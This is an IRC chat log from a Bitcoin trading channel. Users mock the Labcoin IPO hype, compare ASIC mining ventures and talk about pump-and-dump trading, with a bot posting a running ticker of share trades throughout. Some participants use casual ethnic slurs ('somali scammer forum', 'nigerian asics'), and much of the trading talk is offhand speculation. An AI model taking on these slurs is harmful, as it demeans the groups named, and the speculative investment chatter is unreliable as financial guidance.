says "I called ken" out of the blue, first post in AMC thread Jul 31 15:34:18 yeah. Jul 31 15:35:07 problem isn't that, problem is that there's so many idiots in btc that they'll probably make decent bank off it Jul 31 15:35:19 but I don't understand, even if it's "real" and they have a contract going on with easic, it's still… meh Jul 31 15:35:23 and then there won't be an end of it, once they go strut on their somali scammer forum Jul 31 15:35:32 pankkake who;s easic. Jul 31 15:35:46 their supposed asic manufacturer Jul 31 15:35:53 labcoin lovers already trying to run the show, when they dont even hold shares yet. this is amazine Jul 31 15:35:55 you see my point. Jul 31 15:35:55 g Jul 31 15:36:01 https://bitcointalk.org/index.php?topic=263445.msg2838800#msg2838800 Jul 31 15:36:07 [LABCOIN] IPO [BTCT.CO] - Details/FAQ and Discussion (ASIC dev/sales/mining) Jul 31 15:36:07 as long as the shit goes up and i can sell, i don't care if it's made by nigerian asics Jul 31 15:36:09 the thing is that amc doesn' do anything of value, except contacting other companies Jul 31 15:36:20 instant free money makes people idiots I would think Jul 31 15:36:34 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [+] Jul 31 15:36:37 kidkrypto we're discussing finance here. Jul 31 15:36:43 when I talk to people about bitcoin, they instantly ask me about mining - which I never speak about Jul 31 15:38:05 ThickAsThieves well it's like this : some people can do something useful. most don't. people nevertheless are hardwired to not simply give up and die, which is a cruel joke of fate. Jul 31 15:38:20 so like it or not you'll get a bunch of gimps trying to run the marathon. not much can be done about it. Jul 31 15:39:05 was there similar shit talk about asic miner back in the day? Jul 31 15:39:26 you dont get it Jul 31 15:39:39 this isnt back in the day Jul 31 15:39:41 asicminer ipo'd at .1, it was lauighed out of town. it stayed ~.1 forever Jul 31 15:40:17 this is a world where AM already exists as a force, as does BitFury Jul 31 15:40:28 o ya, apparently bitfury also has chips is it ? Jul 31 15:40:33 yeah Jul 31 15:40:40 pity they blew their original bitbet date. Jul 31 15:40:52 i forgot Avalon too Jul 31 15:40:59 avalon seems to be going to shit tbh Jul 31 15:41:07 so basically you have this arms race about unfold Jul 31 15:41:17 and all these little militias collecting money Jul 31 15:41:22 either they failed to get a 2nd run going or botched it somehow, or whatever the fuck, but teh grapevine is well pissed at them. Jul 31 15:41:24 to get murdered Jul 31 15:41:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.041 BTC [+] Jul 31 15:42:22 [HAVELOCK] [AM100] 22 @ 0.0408947 = 0.8997 BTC [+] Jul 31 15:42:32 no one seems to notice that like 100% of ASIC creators delay repeatedly Jul 31 15:42:50 so when you invest in, or buy preorders for the newest contender Jul 31 15:42:58 whatever you do don't ask yifu a question about your avalon, he'll spit in your face Jul 31 15:42:59 you are asking for trouble Jul 31 15:43:04 [HAVELOCK] [SDSTM] 10 @ 0.00899847 = 0.09 BTC [+] Jul 31 15:43:28 [HAVELOCK] [SMG] 21 @ 0.0002695 = 0.0057 BTC [-] Jul 31 15:43:30 there will be no "next ASICMINER" Jul 31 15:43:36 kidkrypto but to round out your question : look up bASIC. pretend-fab, was laughed out of town, blew up Jul 31 15:43:41 the "next ASICMINER" won't be a mining company at all Jul 31 15:43:43 the people that did it moved on to hyping whatever other scam. Jul 31 15:44:09 well, most of them. afaik tom isn't showing his face Jul 31 15:44:16 probably waiting for the usual year. Jul 31 15:45:20 The fuck... Jul 31 15:45:49 <---- next asicminer Jul 31 15:45:49 btct.co doesn't let me trade Jul 31 15:46:16 BTCT.co is "falling victim of it's own success" Jul 31 15:46:31 http://bitbet.us/bet/495/there-will-be-blood/ Jul 31 15:46:36 BitBet - There will be blood Jul 31 15:46:41 [BTCTC] [ACTIVEMINING] 25 @ 0.0055 = 0.1375 BTC [+] Jul 31 15:46:42 [BTCTC] [ACTIVEMINING] 300 @ 0.005499 = 1.6497 BTC [-] Jul 31 15:46:44 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [-] Jul 31 15:46:49 we're already working on gen 5 products Jul 31 15:46:49 2020 release, taking preorders now Jul 31 15:47:00 [BTCTC] [ACTIVEMINING] 25 @ 0.005498 = 0.1375 BTC [-] Jul 31 15:47:02 [BTCTC] [ACTIVEMINING] 25 @ 0.005499 = 0.1375 BTC [+] Jul 31 15:47:04 [BTCTC] [ACTIVEMINING] 50 @ 0.005499 = 0.275 BTC [+] Jul 31 15:47:10 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [-] Jul 31 15:47:13 [BTCTC] [ACTIVEMINING] 350 @ 0.00515 = 1.8025 BTC [-] Jul 31 15:47:52 kakobrekla nice odds on that lol Jul 31 15:48:53 yea Jul 31 15:49:24 I may submit a No bet Jul 31 15:49:27 needs more time Jul 31 15:51:35 [BTCTC] [TAT.ASICMINER] 6 @ 0.03851 = 0.2311 BTC [-] Jul 31 15:52:27 The showman in that song has a better offer than many of the new IPOs: http://www.youtube.com/watch?v=QqEmAsUXVJY Jul 31 15:52:33 [BTCTC] [ASICMINER-PT] 1 @ 4.348 BTC [-] Jul 31 15:52:51 ThickAsThieves: what's wrong with the forum post ref labcoin? just trying to prevent drama ;) Jul 31 15:53:27 it's all wrapped up in drama Jul 31 15:54:06 investors have this mentality like they all run the company Jul 31 15:54:17 and know what "should" be done Jul 31 15:54:42 what the should do is research, decide, then go do something productive Jul 31 15:54:50 they* Jul 31 15:55:11 this behavior they have Jul 31 15:55:16 helps scammers Jul 31 15:55:33 the scammed get all wrapped up in details Jul 31 15:55:48 [BTCTC] [TAT.ASICMINER] 5 @ 0.041 = 0.205 BTC [+] Jul 31 15:55:52 ^ Jul 31 15:56:17 i asked an honest question in that thread Jul 31 15:56:29 What do you like most about LabCoin Jul 31 15:56:38 most people ignored it Jul 31 15:56:57 amc got people hungry for btc Jul 31 15:57:07 So they see Labcoin as another early amc Jul 31 15:57:34 [BTCTC] [ACTIVEMINING] 50 @ 0.005105 = 0.2553 BTC [-] Jul 31 15:57:35 [BTCTC] [ACTIVEMINING] 25 @ 0.005199 = 0.13 BTC [+] Jul 31 15:57:40 [BTCTC] [ACTIVEMINING] 25 @ 0.005106 = 0.1277 BTC [-] Jul 31 15:57:56 [BTCTC] [ACTIVEMINING] 50 @ 0.005021 = 0.2511 BTC [-] Jul 31 15:57:58 [BTCTC] [ACTIVEMINING] 5 @ 0.00502 = 0.0251 BTC [-] Jul 31 15:57:59 [BTCTC] [ACTIVEMINING] 666 @ 0.005013 = 3.3387 BTC [-] Jul 31 15:58:04 [BTCTC] [ACTIVEMINING] 204 @ 0.005012 = 1.0224 BTC [-] Jul 31 15:58:08 labcoin is the next amc! Jul 31 15:58:39 thanks scrat Jul 31 15:58:51 only 2 years..... Jul 31 15:58:54 [BTCTC] [ACTIVEMINING] 25 @ 0.005014 = 0.1254 BTC [+] Jul 31 15:58:56 [BTCTC] [ACTIVEMINING] 25 @ 0.005013 = 0.1253 BTC [-] Jul 31 15:58:58 [BTCTC] [ACTIVEMINING] 25 @ 0.005012 = 0.1253 BTC [-] Jul 31 15:59:00 [BTCTC] [ACTIVEMINING] 525 @ 0.005001 = 2.6255 BTC [-] Jul 31 15:59:19 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Jul 31 15:59:20 welll actually... labcoin IS the next amc. Jul 31 15:59:24 [BTCTC] [ASICMINER-PT] 1 @ 4.176 BTC [-] Jul 31 15:59:26 [BTCTC] [ACTIVEMINING] 100 @ 0.005001 = 0.5001 BTC [-] Jul 31 15:59:26 oh, must be why AMC is crashing so much Jul 31 15:59:31 and what mircea said Jul 31 15:59:41 we need a new labcoin Jul 31 15:59:42 [BTCTC] [ACTIVEMINING] 825 @ 0.005001 = 4.1258 BTC [-] Jul 31 15:59:44 [BTCTC] [ACTIVEMINING] 400 @ 0.005 = 2 BTC [-] Jul 31 15:59:47 i promise ANEWMINING Jul 31 15:59:53 yes, that's why it's so funny Jul 31 15:59:59 TradeFortress: lol Jul 31 16:00:05 It's not really crash, it's a major pump and dump over and over again. Jul 31 16:00:14 [BTCTC] [ACTIVEMINING] 25 @ 0.004999 = 0.125 BTC [-] Jul 31 16:00:16 [BTCTC] [ACTIVEMINING] 10 @ 0.005 = 0.05 BTC [+] Jul 31 16:00:25 i remember when we were lolling in this chan at teh bitcoin gem Jul 31 16:00:31 was it what, 4 months ago ? if that Jul 31 16:00:35 AsicMania, AM for short. Jul 31 16:00:37 labcoin peaked and tanked before it even got released from ipo? Jul 31 16:01:06 It's at 0.02 now, 20x IPO price already. BEFORE IPO! Jul 31 16:01:20 lolz Jul 31 16:01:22 [BTCTC] [ACTIVEMINING] 25 @ 0.004999 = 0.125 BTC [-] Jul 31 16:01:38 call it the old sandstorm classico Jul 31 16:01:41 "Hello! I have indeed been ASLEEP! We have NOT released the shares for sale as we promised we would give the forum a set time for the IPO to keep it as far as possible. The shares will be released AT IPO PRICE 0.001 BTC in 12 HOURS. That is 8 PM CENTRAL TIME! " Jul 31 16:01:46 It's going to have a large wall Jul 31 16:02:08 o my Jul 31 16:02:22 So AMC's value will just drooooop hours before hand Jul 31 16:02:37 did ken post bail yet? Jul 31 16:03:20 where's all this hubla about getting arrested or is that just you guys messing around? Jul 31 16:03:20 [BTCTC] [ACTIVEMINING] 25 @ 0.005 = 0.125 BTC [+] Jul 31 16:03:33 [HAVELOCK] [AM100] 38 @ 0.0408948 = 1.554 BTC [+] Jul 31 16:03:53 just messing Jul 31 16:03:57 See my thread, Sandstorm is 4th case: https://bitcointalk.org/index.php?topic=265172.0 Jul 31 16:04:13 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 31 16:04:22 [BTCTC] [ACTIVEMINING] 25 @ 0.005 = 0.125 BTC [+] Jul 31 16:04:24 [BTCTC] [ACTIVEMINING] 272 @ 0.004999 = 1.3597 BTC [-] Jul 31 16:04:57 [BTCTC] [KENILWORTH] 1 @ 0.001797 BTC [+] Jul 31 16:05:00 [BTCTC] [KENILWORTH] 1 @ 0.001632 BTC [-] Jul 31 16:05:14 [BTCTC] [KENILWORTH] 1 @ 0.001631 BTC [-] Jul 31 16:05:17 [BTCTC] [ACTIVEMINING] 100 @ 0.0048 = 0.48 BTC [-] Jul 31 16:05:19 [BTCTC] [KENILWORTH] 1000 @ 0.001625 = 1.625 BTC [-] Jul 31 16:05:36 [BTCTC] [KENILWORTH] 5 @ 0.001625 = 0.0081 BTC [-] Jul 31 16:05:56 Sell everything! Jul 31 16:06:02 lol Jul 31 16:06:08 Labcoin IPO tonight! Jul 31 16:06:31 ActiveMining is worth more than BitVPS... by a factor of 26 Jul 31 16:06:33 i just sold my house so i can get on the new activemining Jul 31 16:06:44 aka labcoin Jul 31 16:06:54 things will work out when btc goes to 1000 Jul 31 16:07:03 i just sold my house so i can get on the new activemining << this is the new "i'm only 15" Jul 31 16:07:27 maybe it was second life house Jul 31 16:07:32 [BTCTC] [KENILWORTH] 10 @ 0.001624 = 0.0162 BTC [-] Jul 31 16:07:34 they go for like 5$ a pop Jul 31 16:07:34 [BTCTC] [KENILWORTH] 159 @ 0.001561 = 0.2482 BTC [-] Jul 31 16:07:37 [BTCTC] [KENILWORTH] 100 @ 0.00156 = 0.156 BTC [-] Jul 31 16:07:45 it was my parents reitrement house, got them in the car now Jul 31 16:07:51 [BTCTC] [KENILWORTH] 1 @ 0.001551 BTC [-] Jul 31 16:07:57 lol Jul 31 16:08:01 https://www.havelockinvestments.com/order.php?symbol=XBOND Jul 31 16:08:04 Havelock Investments Jul 31 16:08:04 [BTCTC] [KENILWORTH] 2000 @ 0.00155 = 3.1 BTC [-] Jul 31 16:08:06 [BTCTC] [KENILWORTH] 2000 @ 0.001518 = 3.036 BTC [-] Jul 31 16:08:11 [BTCTC] [KENILWORTH] 1000 @ 0.001517 = 1.517 BTC [-] Jul 31 16:08:14 [BTCTC] [KENILWORTH] 1 @ 0.001438 BTC [-] Jul 31 16:08:17 [BTCTC] [KENILWORTH] 50 @ 0.0012 = 0.06 BTC [-] Jul 31 16:08:27 [BTCTC] [ACTIVEMINING] 500 @ 0.0048 = 2.4 BTC [-] Jul 31 16:11:15 [BTCTC] [ACTIVEMINING] 350 @ 0.00471 = 1.6485 BTC [-] Jul 31 16:11:26 what a cluster fuck labcoin is goign to be in 12 hours Jul 31 16:12:04 psa : the girl is getting >10 marriage proposals a week by now. Jul 31 16:12:19 [HAVELOCK] [AM1] 1 @ 4.55 BTC [+] Jul 31 16:12:26 true Jul 31 16:12:28 You mean MPOE-PR? Jul 31 16:12:37 is she entertaining the idea of a suitor? Jul 31 16:12:44 btct can't handle the load i guess Jul 31 16:12:46 Namworld yea Jul 31 16:12:53 lol Labcoin is saying they might clear the orderbooks before IPO Jul 31 16:13:04 everyone loses! Jul 31 16:13:05 oh jesus labcoin tanking Jul 31 16:13:05 I'll contribute. Make it 11 weekly. Jul 31 16:13:19 sell labcoin now? Jul 31 16:13:33 ThickAsThieves i gotta dig up the convo during the bitbet launch i think it was Jul 31 16:13:57 [BTCTC] [ACTIVEMINING] 7 @ 0.004712 = 0.033 BTC [+] Jul 31 16:13:59 [BTCTC] [ACTIVEMINING] 500 @ 0.004708 = 2.354 BTC [-] Jul 31 16:14:06 [BTCTC] [ACTIVEMINING] 100 @ 0.004705 = 0.4705 BTC [-] Jul 31 16:14:08 [BTCTC] [ACTIVEMINING] 400 @ 0.004702 = 1.8808 BTC [-] Jul 31 16:14:11 [BTCTC] [ACTIVEMINING] 1243 @ 0.004701 = 5.8433 BTC [-] Jul 31 16:14:19 so boys and girls, i'm sitting here looking at a 500mb zipfile. Jul 31 16:14:31 :/ Jul 31 16:14:34 prepare yourselves for s.mg client is going to be announced imminently. Jul 31 16:14:54 =o Jul 31 16:15:33 [BTCTC] [PAJKA.BOND] 6 @ 0.02864 = 0.1718 BTC [-] Jul 31 16:15:36 [BTCTC] [PAJKA.BOND] 10 @ 0.02577 = 0.2577 BTC [-] Jul 31 16:18:13 That's great news mircea Jul 31 16:18:53 [BTCTC] [ACTIVEMINING] 25 @ 0.004987 = 0.1247 BTC [+] Jul 31 16:18:55 [BTCTC] [ACTIVEMINING] 50 @ 0.004988 = 0.2494 BTC [+] Jul 31 16:18:57 [BTCTC] [ACTIVEMINING] 400 @ 0.00499 = 1.996 BTC [+] Jul 31 16:18:58 [BTCTC] [ACTIVEMINING] 500 @ 0.005149 = 2.5745 BTC [+] Jul 31 16:19:00 [BTCTC] [ACTIVEMINING] 100 @ 0.0052 = 0.52 BTC [+] Jul 31 16:20:17 [BTCTC] [TAT.MINIGAME] 1000 @ 0.0002889 = 0.2889 BTC [+] Jul 31 16:20:45 Will it be announced in the bitcointalk.org thread? Jul 31 16:20:47 [BTCTC] [ACTIVEMINING] 500 @ 0.005 = 2.5 BTC [-] Jul 31 16:20:58 [BTCTC] [ACTIVEMINING] 1239 @ 0.005498 = 6.812 BTC [+] Jul 31 16:21:01 [BTCTC] [ACTIVEMINING] 261 @ 0.005499 = 1.4352 BTC [+] Jul 31 16:21:03 [BTCTC] [ACTIVEMINING] 25 @ 0.004989 = 0.1247 BTC [-] Jul 31 16:22:55 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jul 31 16:23:04 I see people commenting with short words about my "[GUIDE] The Big Guide to Common Bitcoin Investing Faux Pas" about the fact it's good... but they're posting all the time in ActiveMining threads/CoinLab... Jul 31 16:23:19 I'm not sure they get the point Jul 31 16:24:28 [BTCTC] [ACTIVEMINING] 25 @ 0.004715 = 0.1179 BTC [-] Jul 31 16:24:31 [BTCTC] [ACTIVEMINING] 323 @ 0.004714 = 1.5226 BTC [-] Jul 31 16:24:50 I can't believe I had to buy ActiveMining shares... Jul 31 16:25:39 But someone put a PUT option allowing me to sell at 0.006 (0.008 - 0.002 premium) Jul 31 16:25:53 with all this fuss no one is talking about AM's dividends! Jul 31 16:26:08 projections? Jul 31 16:26:18 same as last week? Jul 31 16:26:30 0.01-0.03 weekly for a while. Jul 31 16:26:34 Might stay stable Jul 31 16:26:46 [BTCTC] [ACTIVEMINING] 25 @ 0.004799 = 0.12 BTC [+] Jul 31 16:26:48 [BTCTC] [ACTIVEMINING] 27 @ 0.0048 = 0.1296 BTC [+] Jul 31 16:26:50 [BTCTC] [ACTIVEMINING] 25 @ 0.0048 = 0.12 BTC [+] Jul 31 16:26:58 Namworld: it's the same as trying to talk gamblers out of whatever-dice Jul 31 16:27:02 [HAVELOCK] [AM100] 1 @ 0.0408948 BTC [+] Jul 31 16:27:35 oooh mircea_popescu... y u no 2 weeks? :D Jul 31 16:27:49 guys Jul 31 16:27:59 already did it once lol Jul 31 16:28:05 labcoin ipo is getting crazy Jul 31 16:28:53 sec is on standby Jul 31 16:28:59 lmao Jul 31 16:29:39 Namworld: you described how things are, but i don't see a conflict here Jul 31 16:30:20 we'll see. the thread is blowing up and theres still 11.5 hrs left Jul 31 16:30:55 burnside would be wise to get some more server bandwith or something Jul 31 16:31:19 afrotec dude, srsly. nobody gives a rat's ass about the most recent forum scam. Jul 31 16:31:37 the more people froth about it, the less we give a shit actually. Jul 31 16:31:41 ahh thank you for your thoughts Jul 31 16:31:49 [BTCTC] [TAT.MINIGAME] 5 @ 0.0002801 = 0.0014 BTC [-] Jul 31 16:31:55 That's a nice way of saying fuck you I imagine Jul 31 16:31:59 i was curious what the sentiment was about the whole thing Jul 31 16:32:06 so now you know. Jul 31 16:32:18 that's what I took it as Jul 31 16:32:32 [BTCTC] [ASICMINER-PT] 1 @ 4.346 BTC [+] Jul 31 16:33:04 Rulother_ not rly, in the sense i dunno who he is so i couldn't be bothered to "fuck you" Jul 31 16:33:18 meanwhile, G.MPOE @ BF panic sells at 0.0001 ... must put moar bids Jul 31 16:34:16 well in other news, gox still up for now Jul 31 16:35:26 [HAVELOCK] [AM1] 1 @ 4.56 BTC [+] Jul 31 16:35:59 [BTCTC] [ASICMINER-PT] 10 @ 4.25 = 42.5 BTC [-] Jul 31 16:36:16 [MPEX] [S.MPOE] 13300 @ 0.00080083 = 10.651 BTC [+] Jul 31 16:36:25 shit Jul 31 16:36:38 why did i miss out on the .0001 Jul 31 16:37:09 what was the volume of that anyway Jul 31 16:37:27 VanCleef: of labcoin? Jul 31 16:37:30 ? Jul 31 16:37:36 It's starting at .001 Jul 31 16:37:45 sorry, i ment mpoe Jul 31 16:37:56 i'm buying labcoin for 1btc a share Jul 31 16:38:13 [BTCTC] [ACTIVEMINING] 25 @ 0.004802 = 0.1201 BTC [+] Jul 31 16:38:16 [BTCTC] [ACTIVEMINING] 50 @ 0.004801 = 0.2401 BTC [-] Jul 31 16:38:17 huh, how so? the pre-IPO price is like 0.02 right? Jul 31 16:38:18 [BTCTC] [ACTIVEMINING] 1034 @ 0.004801 = 4.9642 BTC [-] Jul 31 16:38:21 [BTCTC] [ACTIVEMINING] 395 @ 0.0048 = 1.896 BTC [-] Jul 31 16:38:23 [BTCTC] [ACTIVEMINING] 363 @ 0.00471 = 1.7097 BTC [-] Jul 31 16:38:26 aboutu 500 shares kakobrekla Jul 31 16:38:33 It's .001 Jul 31 16:38:36 probs lil bit more, :( Jul 31 16:39:03 [HAVELOCK] [AM1] 1 @ 4.56 BTC [+] Jul 31 16:39:44 Rulother_: are the pre-IPO shares meant to be bought directly? Jul 31 16:40:09 Directly? Jul 31 16:40:09 while everyone is obsessing about labcoin, im getting amc at 50% off the highs. thank you. Jul 31 16:40:19 [BTCTC] [ACTIVEMINING] 20 @ 0.005198 = 0.104 BTC [+] Jul 31 16:40:43 Rulother_: yeah, similar to buying pre-IPO shares from smidge :) Jul 31 16:40:49 [BTCTC] [ACTIVEMINING] 25 @ 0.004711 = 0.1178 BTC [-] Jul 31 16:40:51 [BTCTC] [ACTIVEMINING] 52 @ 0.004711 = 0.245 BTC [-] Jul 31 16:40:53 [BTCTC] [ACTIVEMINING] 137 @ 0.00471 = 0.6453 BTC [-] Jul 31 16:40:53 to be more precise, while everyone is selling the more stable stuff to get into thin air Jul 31 16:41:23 I have a feeling a vast majority of AMC's shareholders are just buying and selling on the short, are moving over to labcoin. I'm not sure how long it will take for amc to truly recover Jul 31 16:41:46 smidge.com pre-ipo shares are more stable than any of these hyped stocks, you have to admit that Jul 31 16:41:57 must i? Jul 31 16:42:00 ;) Jul 31 16:42:04 ^^ Jul 31 16:42:09 smidge is shit Jul 31 16:42:12 (because AFAIK there is no way currently to buy Smidge.com A shares on exchanges, rather you have to e-mail smidge and buy with packets of 2.5 BTC if I'm not mistaken) Jul 31 16:42:15 [HAVELOCK] [AM100] 1 @ 0.0405 BTC [-] Jul 31 16:42:36 and whats wrong with that freeroute? you want me to rush an ipo? Jul 31 16:42:47 so is it similar with labcoin? or can you buy labcoin shares somewhere on an exchange? Jul 31 16:42:48 [BTCTC] [TAT.ASICMINER] 1 @ 0.04172 BTC [+] Jul 31 16:42:54 [MPEX] [S.MPOE] 7880 @ 0.00080014 = 6.3051 BTC [-] Jul 31 16:42:56 [MPEX] [S.MPOE] 3025 @ 0.00079943 = 2.4183 BTC [-] Jul 31 16:42:57 smidge: I don't think there's anything wrong with that Jul 31 16:42:59 [MPEX] [S.MPOE] 195 @ 0.00079398 = 0.1548 BTC [-] Jul 31 16:43:01 jk smidge Jul 31 16:43:12 [BTCTC] [ACTIVEMINING] 60 @ 0.004702 = 0.2821 BTC [-] Jul 31 16:43:13 [BTCTC] [ACTIVEMINING] 500 @ 0.004702 = 2.351 BTC [-] Jul 31 16:43:18 or at least, I don't have enough knowledge and experience to tell whether anything might be wrong with that Jul 31 16:43:26 shares in TATI just keep going up Jul 31 16:43:29 its fine atm Jul 31 16:43:39 investors are silent Jul 31 16:44:04 if anyone cares to share an explanation to why it might be wrong, then I'm all too happy to listen :) Jul 31 16:44:06 [BTCTC] [ACTIVEMINING] 50 @ 0.004702 = 0.2351 BTC [-] Jul 31 16:44:39 [BTCTC] [ACTIVEMINING] 7 @ 0.004701 = 0.0329 BTC [-] Jul 31 16:44:39 what are you wrong about? Jul 31 16:44:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.03862 = 0.3862 BTC [-] Jul 31 16:44:57 this is getting ridiculous. Jul 31 16:45:01 damn tata got that low Jul 31 16:45:32 [BTCTC] [ACTIVEMINING] 130 @ 0.004701 = 0.6111 BTC [-] Jul 31 16:46:13 [BTCTC] [ACTIVEMINING] 5 @ 0.004701 = 0.0235 BTC [-] Jul 31 16:46:46 ThickAsThieves: no I was just wondering how you could buy Labcoin pre-IPO shares, and whether it was different from buying Smidge.com A shares (which you have to buy directly from smidge). So then smidge asked what was wrong with that, so I replied by telling nothing as far as I know, but if anyone could point out otherwise I would be happy to listen. Jul 31 16:47:22 [BTCTC] [ACTIVEMINING] 600 @ 0.004701 = 2.8206 BTC [-] Jul 31 16:48:25 [BTCTC] [ACTIVEMINING] 5 @ 0.00466 = 0.0233 BTC [-] Jul 31 16:48:28 [BTCTC] [ACTIVEMINING] 1 @ 0.004655 BTC [-] Jul 31 16:48:30 [BTCTC] [ACTIVEMINING] 5 @ 0.004654 = 0.0233 BTC [-] Jul 31 16:48:32 mkay. what's wrong with that in the general is that it conflates different roles, Jul 31 16:48:33 [BTCTC] [ACTIVEMINING] 100 @ 0.004561 = 0.4561 BTC [-] Jul 31 16:48:34 [BTCTC] [ACTIVEMINING] 400 @ 0.00456 = 1.824 BTC [-] Jul 31 16:48:36 [BTCTC] [BTC-BOND] 50 @ 0.009981 = 0.4991 BTC [-] Jul 31 16:48:37 [BTCTC] [ACTIVEMINING] 145 @ 0.004501 = 0.6526 BTC [-] Jul 31 16:48:39 [BTCTC] [ACTIVEMINING] 342 @ 0.0045 = 1.539 BTC [-] Jul 31 16:48:43 and in the particular that nonentities do not get to fulfill fiduciary duties. Jul 31 16:48:57 [BTCTC] [ACTIVEMINING] 166 @ 0.0045 = 0.747 BTC [-] Jul 31 16:50:06 with nonentities you mean exchanges and such? Jul 31 16:50:08 lol TAT you are apparently disappointing people on the forums Jul 31 16:50:21 and they want to sell their 10 shares of TAT.AM Jul 31 16:51:37 [BTCTC] [ACTIVEMINING] 72 @ 0.0045 = 0.324 BTC [-] Jul 31 16:51:41 oh ya? Jul 31 16:51:55 i'll buy em back then Jul 31 16:52:00 s'all good Jul 31 16:52:02 "You're getting harder and harder to take seriously my friend. If you continue to post childish and useless foder I am going to have to reconsider your business expertise and maturity and dump the assets of yours that I own at a considerable loss." Jul 31 16:52:07 [BTCTC] [ACTIVEMINING] 135 @ 0.0083 = 1.1205 BTC [+] Jul 31 16:52:16 lol who said that? Jul 31 16:52:16 looool what Jul 31 16:52:18 a sock? Jul 31 16:52:22 [BTCTC] [TAT.MINIGAME] 25 @ 0.0002889 = 0.0072 BTC [+] Jul 31 16:52:23 Knybe Jul 31 16:52:33 i must have him on ignore for being a sock Jul 31 16:52:36 link? Jul 31 16:52:38 ignored him long time ago Jul 31 16:52:45 https://bitcointalk.org/index.php?topic=252531.msg2838975#msg2838975 Jul 31 16:52:51 there's also another guy complaining about "kids" Jul 31 16:52:57 [ActiveMining] The Official Active Mining Discussion Thread Jul 31 16:53:12 I think he called me "son" once Jul 31 16:53:29 [BTCTC] [ASICMINER-PT] 2 @ 4.3 = 8.6 BTC [+] Jul 31 16:53:43 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0026 BTC [+] Jul 31 16:55:13 [BTCTC] [ACTIVEMINING] 80 @ 0.0043 = 0.344 BTC [-] Jul 31 16:55:16 [BTCTC] [ASICMINER-PT] 10 @ 4.22 = 42.2 BTC [-] Jul 31 16:55:46 [BTCTC] [ACTIVEMINING] 1 @ 0.004301 BTC [+] Jul 31 16:55:48 [BTCTC] [ACTIVEMINING] 170 @ 0.0043 = 0.731 BTC [-] Jul 31 16:56:10 [BTCTC] [ACTIVEMINING] 80 @ 0.0083 = 0.664 BTC [+] Jul 31 16:56:16 [HAVELOCK] [AM100] 10 @ 0.04 = 0.4 BTC [-] Jul 31 16:56:29 [BTCTC] [ACTIVEMINING] 1 @ 0.004264 BTC [-] Jul 31 16:56:32 [BTCTC] [ACTIVEMINING] 7 @ 0.004261 = 0.0298 BTC [-] Jul 31 16:56:34 [BTCTC] [ACTIVEMINING] 7 @ 0.004207 = 0.0294 BTC [-] Jul 31 16:56:37 [BTCTC] [ACTIVEMINING] 465 @ 0.004205 = 1.9553 BTC [-] Jul 31 16:56:42 [BTCTC] [ACTIVEMINING] 85 @ 0.0083 = 0.7055 BTC [+] Jul 31 16:57:28 [BTCTC] [ACTIVEMINING] 4 @ 0.004265 = 0.0171 BTC [-] Jul 31 16:57:30 [BTCTC] [ACTIVEMINING] 1 @ 0.004265 BTC [-] Jul 31 16:57:56 [BTCTC] [ACTIVEMINING] 30 @ 0.004209 = 0.1263 BTC [-] Jul 31 16:57:58 [BTCTC] [ACTIVEMINING] 178 @ 0.004208 = 0.749 BTC [-] Jul 31 16:58:00 [BTCTC] [ACTIVEMINING] 15 @ 0.004205 = 0.0631 BTC [-] Jul 31 16:58:01 So coinbase hired Charlie Lee? Jul 31 16:58:03 [BTCTC] [ACTIVEMINING] 46 @ 0.004203 = 0.1933 BTC [-] Jul 31 16:58:18 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0027 BTC [+] Jul 31 16:58:43 [BTCTC] [KENILWORTH] 40 @ 0.001783 = 0.0713 BTC [+] Jul 31 16:58:55 [BTCTC] [ACTIVEMINING] 315 @ 0.00425 = 1.3388 BTC [+] Jul 31 16:58:57 [BTCTC] [ACTIVEMINING] 382 @ 0.004203 = 1.6055 BTC [-] Jul 31 16:59:11 litecoin support? Jul 31 16:59:52 I suppose, that'll be nice to have Jul 31 16:59:59 afrotec: not necessarily, coblee did more stuff than just litecoin Jul 31 17:00:11 vagcoin? Jul 31 17:00:39 [BTCTC] [ACTIVEMINING] 772 @ 0.004203 = 3.2447 BTC [-] Jul 31 17:00:42 [BTCTC] [ACTIVEMINING] 600 @ 0.004203 = 2.5218 BTC [-] Jul 31 17:00:52 Yeah he's worked on a lot of different things Jul 31 17:00:54 [BTCTC] [ACTIVEMINING] 1000 @ 0.004203 = 4.203 BTC [-] Jul 31 17:00:57 [BTCTC] [ACTIVEMINING] 2176 @ 0.0042 = 9.1392 BTC [-] Jul 31 17:01:03 7000btc for 70% is around 1 million dollars right? Jul 31 17:01:08 valuation Jul 31 17:01:17 could be a coincidence, but still... if they were ever thinking about adding it, Lee would be the guy to have on board Jul 31 17:01:30 im talkin future Jul 31 17:01:36 the best part is you're paying 300k to the management team Jul 31 17:01:37 lol Jul 31 17:01:46 [BTCTC] [TAT.MINIGAME] 1 @ 0.0002889 BTC [+] Jul 31 17:01:49 [BTCTC] [ASICMINER-PT] 1 @ 4.177 BTC [-] Jul 31 17:01:57 vagocoin lol Jul 31 17:02:04 VanCleef i noticed that too, but the management have already put 150k Jul 31 17:02:06 freeroute no, i mean people w/o a wot Jul 31 17:02:15 okey Jul 31 17:02:30 i still don't get the 1miilion dollar valuation, they wont even address it Jul 31 17:02:32 [BTCTC] [BTC-BOND] 42 @ 0.009981 = 0.4192 BTC [-] Jul 31 17:02:34 [BTCTC] [BTC-BOND] 4 @ 0.00998 = 0.0399 BTC [-] Jul 31 17:02:36 [BTCTC] [BTC-BOND] 50 @ 0.009951 = 0.4976 BTC [-] Jul 31 17:02:38 [BTCTC] [BTC-BOND] 1 @ 0.00995 BTC [-] Jul 31 17:02:39 [BTCTC] [BTC-BOND] 2 @ 0.00993 = 0.0199 BTC [-] Jul 31 17:02:41 [BTCTC] [BTC-BOND] 20 @ 0.009901 = 0.198 BTC [-] Jul 31 17:02:43 [BTCTC] [BTC-BOND] 10 @ 0.0099 = 0.099 BTC [-] Jul 31 17:02:43 [HAVELOCK] [AM1] 1 @ 4.55 BTC [-] Jul 31 17:02:46 [BTCTC] [BTC-BOND] 571 @ 0.0099 = 5.6529 BTC [-] Jul 31 